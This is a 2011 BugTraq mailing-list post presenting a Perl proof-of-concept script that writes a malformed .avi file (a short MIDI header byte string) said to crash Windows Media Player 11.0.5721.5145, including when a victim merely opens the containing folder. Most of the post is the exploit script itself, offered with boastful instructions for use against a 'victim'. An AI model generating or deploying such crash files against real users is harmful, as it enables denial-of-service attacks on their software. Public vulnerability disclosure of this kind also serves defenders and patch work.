BugTraq
Flag this message Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit Mar 31 2011 09:34PM
^Xecuti0N3r (xecuti0n3r yahoo com)
Hello Team,

I have attached a file WMPExploit.pl which makes exploits the memory vulnerability in Windows Media player 11.0.5721.5145 which can be used to perform a Denial of Service attack :) and to cause a crash.

To run this file, compile the WMPExploit.pl using perl and then you may open the generated exploit .avi file using Windows Media player. If run properly, many a times, there is a crash every-time whenever the victim opens the folder in which the Exploit is placed.

Thanks and Regards,

^Xecuti0N3r#!/usr/bin/perl
#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
#(+)Software : Windows Media player
#(+)Version : 11.0.5721.5145
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 13:37
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

system("color 6");
system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________

(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit


(+) Software : Windows Media player
(+) Version : 11.0.5721.5145
(+) Tested On : WIN-XP SP3
(+) Date : 31.03.2011
(+) Hour : 13:37 PM
____________________________________________________________________\n ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nWMPExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";

open(file, "> WMPExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n#################################################################
#######\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail : xecuti0n3r (at) yahoo (dot) com [email concealed] \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################
\n\n";
system("pause");

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus